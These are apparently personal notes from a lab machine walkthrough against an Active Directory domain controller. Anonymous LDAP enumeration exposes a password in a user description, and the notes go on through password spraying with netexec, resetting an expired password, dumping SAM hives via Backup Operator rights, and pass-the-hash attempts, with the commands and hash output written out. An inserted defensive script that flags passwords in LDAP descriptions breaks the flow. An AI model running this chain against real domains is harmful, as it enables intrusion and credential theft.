## External, Unauthenticated

Remote services:

- Kerberos
- Simple DNS
- SMB
  - `null` -> yes
  - shares? -> denied
  - [[RID Brute]]? -> denied
  - `guest`? -> disabled
- Domain Controller:
  - **Domain:** `baby.vl`
  - **Machine:** `BabyDC.baby.vl`
- LDAP
  - Anon bind? -> yes
  - Users? -> yes
  - One of them contains password <3

### LDAP + Password Spray

Generate a list of users

```sh
# unauthenticated search
ldapsearch -x -H ldap://$RHOST -b "DC=baby,DC=vl" "(objectClass=user)" > ldap-users.out
# read out user descriptions to terminal
grep "description:" ldap-users.out
# reveals password: BabyStart123!
# read out users to terminal
grep "sAMAccountName:" ldap-users.out
# pipe them to file
grep "sAMAccountName:" ldap-users.out | awk '{print $2}' > users.txt
```

I'll compile a list of users by hand:

```
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Ian.Walker
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinson
```

Let's spray those with the password:

```
╭─[λ]-[admin.konstantinovitz.com]-[/targets/baby/creds]-[10.10.100.147]
╰─> nxc smb $RHOST -u users.txt -p passwords.txt --continue-on-success
SMB         10.10.100.147   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         10.10.100.147   445    BABYDC           [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.100.147   445    BABYDC           [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.100.147   445    BABYDC           [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.100.147   445    BABYDC           [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.100.147   445    BABYDC           [-] baby.vl\Ian.Walker:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.100.147   445    BABYDC           [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.100.147   445    BABYDC           [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.100.147   445    BABYDC           [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.100.147   445    BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.100.147   445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
```

We get a hit for `Caroline.Robinson`, but we must change her password somehow....

```sh
smbpasswd -r $RHOST -U 'Caroline.Robinson'
```

We set the password to `password123!`

## `Caroline.Robinson`

- SMB
  - Shares
    - `R` on [[SMB Share - ADMIN$]]
      - GG?
      - Maybe read ntds.dit??
        - Access denied for `NTDS/` folder
        - Treating this as rabbit hole for now
    - `RW` on `C`
- winrm -> yes
- bloodhound <3
  - `MemberOf` [[AD Group - Backup Operator]]
  - Wiiin

### [[AD Group - Backup Operator]]

```
# verify access
whoami /priv
# yields SeBackupPrivilege
```

```powershell
reg save hklm\sam c:\windows\tasks\SAM
reg save hklm\system c:\windows\tasks\SYSTEM
```

Download those and run

```sh
secretsdump.py -sam SAM -system SYSTEM LOCAL
```

```
secretsdump.py -sam SAM -system SYSTEM LOCAL
/home/noctua/.local/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
```

- Why do only some accounts show up here?
  - Is it only local system accounts??

Soooo.... I'll attempt to connect as `Administrator`:

```
evil-winrm -i $RHOST -u 'Administrator' -H '8d992faed38128ae85e95fa35868bb43'
```

No love there.

- Crack it?
  - Password appears to be too long...
  - Doesn't show up on crack station.

I'm starting to think that I'm down the wrong path here....

So apparently was supposed to do a [[Volume Shadow Copy Service]]?
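The LDAP step above found a password sitting in a user's `description` attribute; the grep only catches it if you already know what to look for. As an added defensive audit (not part of the original notes, and not a tool from this box), this script parses the LDIF that `ldapsearch` emits, including base64 `::` values and folded continuation lines, and flags any description that looks like it carries a credential. The LDIF below is constructed sample data in the same shape as the `ldapsearch -x` output; only `BabyStart123!` comes from the notes.

```python
import base64
import re

# Constructed sample LDIF (same shape as `ldapsearch -x` output); names and values are invented.
SAMPLE_LDIF = """\
# extended LDIF
dn: CN=Jacqueline Barnett,OU=it,DC=baby,DC=vl
sAMAccountName: Jacqueline.Barnett
description: Developer, 2nd floor

dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
sAMAccountName: Teresa.Bell
description: Set initial password to
  BabyStart123!

dn: CN=Hugh George,OU=it,DC=baby,DC=vl
sAMAccountName: Hugh.George
description:: UHc6IFN1bW1lcjIwMjQh
"""

# Credential hints: password-ish keywords, or a word+digits+symbol token typical of initial passwords.
CRED_HINT = re.compile(r"(?i)\b(pass(word|wd)?|pw|pwd|cred|initial)\b|[A-Za-z]+\d{2,}[!@#$%^&*]")


def _unfold(text):
    """Join LDIF continuation lines (a leading space) onto the previous line."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text):
    """Return one {attribute: [values]} dict per LDIF entry; 'attr:: ...' values are base64."""
    entries, cur = [], {}
    for line in _unfold(text) + [""]:          # trailing "" flushes the last entry
        if line == "":
            if cur:
                entries.append(cur)
            cur = {}
            continue
        if line.startswith("#"):                # LDIF comments
            continue
        attr, _, val = line.partition(":")
        if val.startswith(":"):                 # base64-encoded value
            val = base64.b64decode(val[1:].strip()).decode("utf-8", "replace")
        cur.setdefault(attr, []).append(val.strip())
    return entries


def find_credential_hints(text):
    """Return (sAMAccountName, description) pairs whose description looks like a credential."""
    hits = []
    for entry in parse_ldif(text):
        for desc in entry.get("description", []):
            if CRED_HINT.search(desc):
                hits.append((entry.get("sAMAccountName", ["?"])[0], desc))
    return hits
```

Run it over a real `ldap-users.out` and review every hit; anything flagged should be removed from the directory and the account's password rotated.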
## Lessons Learned

- Generate new target script
  - nmap scripts
    - default
    - all ports
    - nmap quick
- apache ldap browser
- learned not to solely rely on a single `ldapsearch` or netexec run to discover usernames from `ldap`
- [[AD - Resetting Expired Passwords]]